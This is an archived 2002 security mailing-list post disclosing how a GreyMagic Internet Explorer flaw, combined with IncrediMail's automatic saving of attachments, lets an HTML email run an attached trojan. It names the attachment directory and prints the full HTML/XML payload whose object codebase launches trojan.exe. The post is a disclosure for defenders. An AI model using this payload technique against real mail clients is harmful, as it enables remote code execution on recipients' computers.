MSIE vulnerability exploitable with IncrediMail

From: Eric Detoisien (eric.detoisien@global-secure.fr)
Date: Fri Mar 15 2002 - 09:33:21 PST

Next message: Martijn Lievaart: "Re: ZLib double free bug: Windows NT potentially unaffected"

Previous message: Thomas Insel: "Re: OpenSSH rebuild warning: problems avoiding zlib problems in Solaris"
Next in thread: Thor Larholm: "RE: MSIE vulnerability exploitable with IncrediMail"
Reply: Thor Larholm: "RE: MSIE vulnerability exploitable with IncrediMail"
Reply: Eric Detoisien: "RE: MSIE vulnerability exploitable with IncrediMail"
Reply: Thor Larholm: "RE: MSIE vulnerability exploitable with IncrediMail"
Reply: Magnus Bodin: "MSIE vulnerability exploitable with Eudora (was: IncrediMail)"
Reply: Joachim Thuau: "RE: MSIE vulnerability exploitable with IncrediMail"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi,

	A Microsoft Internet Explorer vulnerability was found by GreyMagic
(http://security.greymagic.com/adv/gm001-ie/). With IncrediMail, it's
possible to gain a remote access on a computer.

	Incredimail save automatically email attachements in this directory 
(on Windows 2000 Professionnal) :
C:\Program Files\IncrediMail\Data\Identities\{42D00B20-479C-11d4-9706-00105A40931C}\Message Store\Attachments

	So if you send an html email with the GreyMagic vulnerability and a 
trojan in attachments, it will be save in this directory. 

The html mail contains this code :

 <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="C:/Program Files/IncrediMail/Data/Identities/{42D00B20-479C-11d4-9706-00105A40931C}/Message Store/Attachments/trojan.exe"></object>
            ]]>
        </exploit>
    </security>
</xml> 	

	So, the trojan is executed automatically.


Eric DETOISIEN
Consultant Sécurité
GLOBAL SECURE
Tel. : 01-44-70-48-02
Fax. : 01-44-70-48-49 
Web  : http://www.global-secure.fr

Next message: Martijn Lievaart: "Re: ZLib double free bug: Windows NT potentially unaffected"
Previous message: Thomas Insel: "Re: OpenSSH rebuild warning: problems avoiding zlib problems in Solaris"
Next in thread: Thor Larholm: "RE: MSIE vulnerability exploitable with IncrediMail"
Reply: Thor Larholm: "RE: MSIE vulnerability exploitable with IncrediMail"
Reply: Eric Detoisien: "RE: MSIE vulnerability exploitable with IncrediMail"
Reply: Thor Larholm: "RE: MSIE vulnerability exploitable with IncrediMail"
Reply: Magnus Bodin: "MSIE vulnerability exploitable with Eudora (was: IncrediMail)"
Reply: Joachim Thuau: "RE: MSIE vulnerability exploitable with IncrediMail"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Mar 15 2002 - 14:46:13 PST